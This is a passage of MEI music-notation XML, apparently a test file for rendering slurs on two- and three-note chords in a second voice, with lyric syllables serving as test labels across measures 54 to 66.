</verse>\r\n                                            <verse xml:id=\"verse-L201F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L201F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L201F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L201F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L201F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L201F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L201F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L202F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L202F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L202F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L201F2-L202F2N1\" staff=\"1\" startid=\"#chord-L201F2\" endid=\"#chord-L202F2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L203\" n=\"55\">\r\n                            <staff xml:id=\"staff-L203F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L203F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L204F1\" dur=\"2\" ploc=\"b\" oloc=\"4\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L203F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L204F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L204F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L204F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L204F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L204F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L204F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L204F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L204F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L204F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L204F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L204F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L205F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L205F2S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L205F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L204F2-L205F2N1\" staff=\"1\" startid=\"#chord-L204F2\" endid=\"#chord-L205F2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L208\" n=\"56\">\r\n                            <staff xml:id=\"staff-L208F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L208F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L209F1\" dur=\"2\" ploc=\"b\" oloc=\"4\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L208F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L209F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L209F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L209F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L209F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L209F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L209F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L209F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L209F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L209F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L209F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L209F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L209F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L209F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L209F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L209F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L210F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L210F2S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L210F2S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L209F2N2-L210F2N1\" staff=\"1\" startid=\"#note-L209F2S1\" endid=\"#note-L210F2S1\" />\r\n                            <slur xml:id=\"slur-L209F2N1-L210F2N2\" staff=\"1\" startid=\"#note-L209F2S2\" endid=\"#note-L210F2S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L211\" n=\"57\">\r\n                            <staff xml:id=\"staff-L211F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L211F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L212F1\" dur=\"2\" ploc=\"e\" oloc=\"6\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L211F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L212F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L212F2S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L212F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L212F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L212F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L212F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L212F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L212F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L212F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L212F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L212F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L212F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L212F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L212F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L212F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L213F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L213F2S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L213F2S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L212F2N2-L213F2N1\" staff=\"1\" startid=\"#note-L212F2S2\" endid=\"#note-L213F2S2\" />\r\n                            <slur xml:id=\"slur-L212F2N1-L213F2N2\" staff=\"1\" startid=\"#note-L212F2S1\" endid=\"#note-L213F2S1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L214\" n=\"58\">\r\n                            <staff xml:id=\"staff-L214F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L214F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L215F1\" dur=\"2\" ploc=\"e\" oloc=\"6\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L214F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L215F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L215F2S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L215F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L215F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L215F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L215F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L215F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L215F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L215F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L215F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L215F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L215F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L215F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L215F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L215F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L216F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L216F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L216F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L215F2N2-L216F2N1\" staff=\"1\" startid=\"#note-L215F2S2\" endid=\"#note-L216F2S1\" />\r\n                            <slur xml:id=\"slur-L215F2N1-L216F2N2\" staff=\"1\" startid=\"#note-L215F2S1\" endid=\"#note-L216F2S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L217\" right=\"dbl\" n=\"59\">\r\n                            <staff xml:id=\"staff-L217F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L217F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L218F1\" dur=\"2\" ploc=\"b\" oloc=\"4\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L217F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L218F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L218F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L218F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L218F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L218F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L218F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L218F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L218F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L218F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L218F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L218F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L218F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L218F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L218F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L218F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L219F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L219F2S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L219F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L218F2N2-L219F2N1\" staff=\"1\" startid=\"#note-L218F2S1\" endid=\"#note-L219F2S2\" />\r\n                            <slur xml:id=\"slur-L218F2N1-L219F2N2\" staff=\"1\" startid=\"#note-L218F2S2\" endid=\"#note-L219F2S1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L221\" n=\"60\">\r\n                            <staff xml:id=\"staff-L221F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L221F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L223F1\" dur=\"2\" ploc=\"d\" oloc=\"5\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L221F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L223F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L223F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L223F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L223F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L223F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L223F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L223F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L223F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L223F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L223F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L223F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L223F2S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L223F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L223F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L223F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L223F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L224F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L224F2S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L224F2S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L224F2S3\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L223F1\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000001034745596\" fontstyle=\"normal\">Second voice, three-note chords with 1, 2 and 3 slurs</rend>\r\n                            </dir>\r\n                            <slur xml:id=\"slur-L223F2-L224F2N1\" staff=\"1\" startid=\"#chord-L223F2\" endid=\"#chord-L224F2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L225\" n=\"61\">\r\n                            <staff xml:id=\"staff-L225F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L225F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L226F1\" dur=\"2\" ploc=\"e\" oloc=\"6\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L225F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L226F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L226F2S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L226F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L226F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L226F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L226F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L226F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L226F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L226F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L226F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L226F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L226F2S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L226F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L226F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L226F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L226F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L227F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L227F2S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L227F2S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L227F2S3\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L226F2-L227F2N1\" staff=\"1\" startid=\"#chord-L226F2\" endid=\"#chord-L227F2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L228\" n=\"62\">\r\n                            <staff xml:id=\"staff-L228F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L228F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L229F1\" dur=\"2\" ploc=\"e\" oloc=\"6\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L228F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L229F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L229F2S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L229F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L229F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L229F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L229F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L229F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L229F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L229F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L229F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L229F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L229F2S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L229F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L229F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L229F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L229F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L230F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L230F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L230F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L230F2S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L229F2-L230F2N1\" staff=\"1\" startid=\"#chord-L229F2\" endid=\"#chord-L230F2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L231\" n=\"63\">\r\n                            <staff xml:id=\"staff-L231F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L231F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L232F1\" dur=\"2\" ploc=\"d\" oloc=\"5\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L231F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L232F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L232F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L232F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L232F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L232F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L232F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L232F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L232F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L232F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L232F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L232F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L232F2S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L232F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L232F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L232F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L232F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L233F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L233F2S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L233F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L233F2S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L232F2-L233F2N1\" staff=\"1\" startid=\"#chord-L232F2\" endid=\"#chord-L233F2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L235\" n=\"64\">\r\n                            <staff xml:id=\"staff-L235F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L235F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L236F1\" dur=\"2\" ploc=\"d\" oloc=\"5\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L235F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L236F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L236F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L236F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L236F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L236F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L236F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L236F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L236F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L236F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L236F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L236F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L236F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L236F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L236F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L236F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L236F2S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L236F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L236F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L236F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L236F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L236F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L236F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L237F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L237F2S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L237F2S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L237F2S3\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L236F2N2-L237F2N1\" staff=\"1\" startid=\"#note-L236F2S1\" endid=\"#note-L237F2S1\" />\r\n                            <slur xml:id=\"slur-L236F2N1-L237F2N2\" staff=\"1\" startid=\"#note-L236F2S2\" endid=\"#note-L237F2S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L238\" n=\"65\">\r\n                            <staff xml:id=\"staff-L238F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L238F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L239F1\" dur=\"2\" ploc=\"e\" oloc=\"6\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L238F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L239F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L239F2S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L239F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L239F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L239F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L239F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L239F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L239F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L239F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L239F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L239F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L239F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L239F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L239F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L239F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L239F2S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L239F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L239F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L239F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L239F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L239F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L239F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L240F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L240F2S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L240F2S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L240F2S3\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L239F2N2-L240F2N1\" staff=\"1\" startid=\"#note-L239F2S1\" endid=\"#note-L240F2S1\" />\r\n                            <slur xml:id=\"slur-L239F2N1-L240F2N2\" staff=\"1\" startid=\"#note-L239F2S2\" endid=\"#note-L240F2S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L241\" n=\"66\">\r\n                            <staff xml:id=\"staff-L241F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L241F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L242F1\" dur=\"2\" ploc=\"e\" oloc=\"6\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L241F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L242F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L242F2S1\" oct=\"5\" 